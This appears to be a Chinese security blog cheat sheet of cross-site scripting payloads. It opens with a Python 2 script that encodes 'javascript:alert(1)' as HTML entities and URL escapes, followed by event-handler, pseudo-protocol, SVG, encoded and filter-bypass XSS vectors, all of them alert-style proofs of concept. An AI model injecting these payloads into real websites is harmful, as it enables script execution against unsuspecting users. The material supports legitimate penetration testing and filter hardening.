转换脚本

#coding=utf-8
import re

s='javascript:alert(1);'
flag_10=''
flag_16=''
flag_url=''
for x in xrange(0,len(s)):
    flag_10+='&#'+str(ord(s[x:x+1]))+';' #10进制
    flag_16+='&#x'+s[x:x+1].encode('hex') #16进制
    flag_url+='%'+s[x:x+1].encode('hex')
print flag_10 # &#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41&#59
print flag_16
print flag_url

# s1='javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(15&#x29'
# ans=re.sub('&#x','',s1)
# ans=re.split(';',ans)
# flag=''
# for x in ans:
#     flag+=x.decode('hex')
# print flag

事件xss语句

<body/onload=alert(25)>
<img src=1 onerror=alert(1)> 错误执行
<img src=1 onmouseover=alert(xss)>当鼠标进入选区执行代码
<img src=1 onmouseenter=alert(xss)>当鼠标离开选区执行代码
<img src=1 onmouseleave=alert(xss)>当鼠标在选区滚轮时执行代码
<img src=1 onfocusin=alert(xss)> 当获得焦点时执行代码
<img src=1 onfocusout=alert(xss)>当失去焦点时执行代码
<img src=1 onstart=alert(xss)> 当显示内容时执行代码
<img src=1 oncontextmenu=alert(xss)> 鼠标在选区右键执行代码
<img src=1 ondrag=alert(xss)> ondrag、ondragenter、ondragover:选择内容并拖动时执行代码 
<img src=1 onselectstart=alert(xss)> 选择内容时执行代码
<img src=1 onclick=alert(xss)> 点击时执行

伪协议xss语句

<iframe src=javascript:prompt(/StoredXssByIframeTag/);></iframe>  
<object data=data:text/html;base64,PHNjcmlwdD5wcm9tcHQoL1N0b3JlZFhzc0J5T2JqZWN0VGFnLyk7PC9zY3JpcHQ+></object>  
<object data="javascript:alert(document.domain)">
<a href='javascript:alert(1);'>xss</a>

html5 xss语句

<svg onload=prompt(/XSS/)>  
<embed src=javascript:alert(/XSS/);>  
<svg>
    <script>&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;</script>
</svg>

编码后的 xss语句

<svg>
    <script>&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;</script>
</svg>
<a href='javascript:%61%6c%65%72%74%28%31%29'>alert1</a>
<script/src=data:text/j\141v\141script,\u0061%6C%65%72%74(/XSS/)></script>
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<img src=1 onerror=alert(String.fromCharCode(88,83,83))>
<a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:%61%6c%65%72%74%28%32%29">111111111</a>
<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">aaa</a>

<a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(15)">aaa</a>

<a href="javascript:\u0061\u006c\u0065\u0072\u0074(15)">aaa</a>


<a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x31;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x36;&#x33;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x35;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x32;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x34;&#x28;&#x31;&#x35;&#x29;"></a>

其他的绕过payload

<q/oncut=alert(1)>(谷歌上能执行)
<form><button formaction=javascript&colon;alert(21)>
<body/onload=alert(25)>
<script src=data:text/javascript,alert(88199)></script>
<script>confirm(88199)</script>
<script>prompt(88199)</script>
<iframe/onload=alert(document.domain)></iframe>
<script>alert(navigator.userAgent)</script>
<script>alert(`XSS`)</script>
<img src=x onerror="javascript:window.onerror=alert;throw 1">

<script>z='javascript:'</script>
<script>z=z+'alert(/xxss/)'</script>
<script>eval(z)</script>   

<IFRAME SRC="javascript:alert(29);"></IFRAME>

<script>
    var x = "123</script><script>alert(1);//";
</script>


闭合优先级高于双引号的标签
<iframe>
<noframes>
<noscript>
<script>
<style>
<title>
<xmp>
利用方式
<noframes>
<img src="//a.com</noframes><script>alert(1)</script>">
</noframes>

参考:

xss总结
xss-payload

  • 浏览器解释机制和svg xss

    前言最近,再看看xss,发现对xss并不是太了解,学习xss需要了解到浏览器的解释机制。我是看Tuuu Nya师傅文章里推荐的文章(深入理解浏览器解释机制和xss向量编码)。我自己总结一下吧。 浏览器解析机制浏览器解析一篇HTML文档...

    浏览器解释机制和svg xss
  • xss的绕过和利用

    同源策略同源策略(Same origin policy)是一种约定,它是最核心也最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能都会受到影响。可以说Web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现。 浏览...

    xss的绕过和利用
  • linux三剑客

    前言之前用一些脚本都经常用到grep,sed,awk。但是一直不太熟悉,今天来学习一下,做个备忘录。 grep格式: grep [OPTIONS] PATTERN [FILE...] grep [OPTIONS] [-e PATTER...

    linux三剑客
  • i春秋2020新春战“疫”网络安全公益赛 web Writeup

    前言这次比赛题目质量挺好的,除啦环境可能有时候有点问题。(就让我遇到了。心态炸了一天。。。)其他都挺好的。 DAY1简单的招聘系统知识点:sql注入的联合注入或盲注存在注册和登陆功能,首先进行注册后登陆进系统,发现有一个模块是管理员才...

    i春秋2020新春战“疫”网络安全公益赛 web Writeup
  • 计算机组成原理学习

    计算机组成原理第一章 计算机系统概论计算机系统的层次结构 冯·诺依曼计算机的特点 计算机由运算器、存储器、控制器、输入设备和输出设备五大部件组成 指令(程序)和数据以二进制同等地位地存储在存储器中,可按址寻访 指令由操作码和地址码组...

    计算机组成原理学习
  • 2019安洵杯+2019广外比赛web部分题解

    2019安洵杯easy_web知识点:MD5强碰撞,命令执行这个题比较简单,看题目发现传入参数img和cmd,然而图片是传入的img参数控制,让我想到ddctf的一道题,然后发现img是通过把文件名进行转十六进制后两次base64编码...

    2019安洵杯+2019广外比赛web部分题解
  • bypass disfunction

    前言PHP 的 disabled_functions主要是用于禁用一些危险的函数防止攻击者执行系统命令。但是有一些绕过方法。这里做个总结。 基本思路有四种绕过 disable_functions 的手法:第一种,攻击后端组件,寻找存在...

    bypass disfunction
  • 2019极客大挑战RCE ME

    题目环境:http://114.116.44.23:40001/ 题目还是老样子。无字母数字rce。知识点其实都有写过,就不说了。详细参见:【RCE提高篇】题目源码: <?php ini_set("display_errors"...

    2019极客大挑战RCE ME
  • RCE提高篇

    前言首先,需要了解一下命令执行的函数,这里推荐几篇文章,来认识这些函数。浅谈eval和assert从底层分析eval和assert的区别命令执行与代码执行的小结巧用命令注入的N种方式命令注入绕过姿势我就不在说这几个东西,大牛们都说的很...

    RCE提高篇
  • buuctf刷题记录(序)

    love math知识点:代码审计,绕waf直接给出源码: <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ sho...

    buuctf刷题记录(序)